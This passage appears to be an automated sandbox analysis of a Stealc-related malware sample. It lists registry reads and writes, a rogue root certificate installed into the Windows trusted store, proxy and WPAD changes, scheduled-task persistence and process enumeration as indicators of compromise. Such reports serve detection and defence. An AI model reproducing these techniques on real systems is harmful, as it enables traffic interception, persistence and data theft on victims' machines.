description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs MjytQiW.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 MjytQiW.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs MjytQiW.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8\WpadDecisionReason = "1" MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A506038-0EFD-4C38-8C5F-AF5F359B44E3} MjytQiW.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A506038-0EFD-4C38-8C5F-AF5F359B44E3}\WpadDecisionReason = "1" MjytQiW.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MYkdETq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates MjytQiW.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8\WpadDecisionTime = a0c9e5daf507db01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A506038-0EFD-4C38-8C5F-AF5F359B44E3}\da-d3-6d-ba-98-b8 MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MjytQiW.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" MYkdETq.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 MjytQiW.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A506038-0EFD-4C38-8C5F-AF5F359B44E3}\WpadDecisionTime = a0c9e5daf507db01 MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached MYkdETq.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs MjytQiW.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs MjytQiW.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" MYkdETq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MjytQiW.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-d3-6d-ba-98-b8 MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A506038-0EFD-4C38-8C5F-AF5F359B44E3}\da-d3-6d-ba-98-b8 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MjytQiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 axplong.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 axplong.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 6InNj3SOTk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 6InNj3SOTk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 axplong.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 6InNj3SOTk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 6InNj3SOTk.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2848 schtasks.exe 1948 schtasks.exe 2728 schtasks.exe 1236 schtasks.exe 2512 schtasks.exe 2068 schtasks.exe 796 schtasks.exe 1304 schtasks.exe 2904 schtasks.exe 1552 schtasks.exe 680 schtasks.exe 2804 schtasks.exe 844 schtasks.exe 1252 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 2056 axplong.exe 2724 6InNj3SOTk.exe 2080 stealc_default2.exe 952 bhh9YfYYwa.exe 2324 RegAsm.exe 2324 RegAsm.exe 2324 RegAsm.exe 952 bhh9YfYYwa.exe 952 bhh9YfYYwa.exe 2080 stealc_default2.exe 2812 penis.exe 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif 2764 bundle.exe 2764 bundle.exe 2764 bundle.exe 276 powershell.exe 276 powershell.exe 276 powershell.exe 868 powershell.exe 2308 powershell.exe 2308 powershell.exe 2308 powershell.exe 236 powershell.EXE 236 powershell.EXE 236 powershell.EXE 1944 powershell.EXE 1944 powershell.EXE 1944 powershell.EXE 1660 powershell.exe 2600 powershell.EXE 2600 powershell.EXE 2600 powershell.EXE 2572 powershell.exe 2572 powershell.exe 2572 powershell.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2300 MjytQiW.exe 2020 powershell.exe 2300 MjytQiW.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
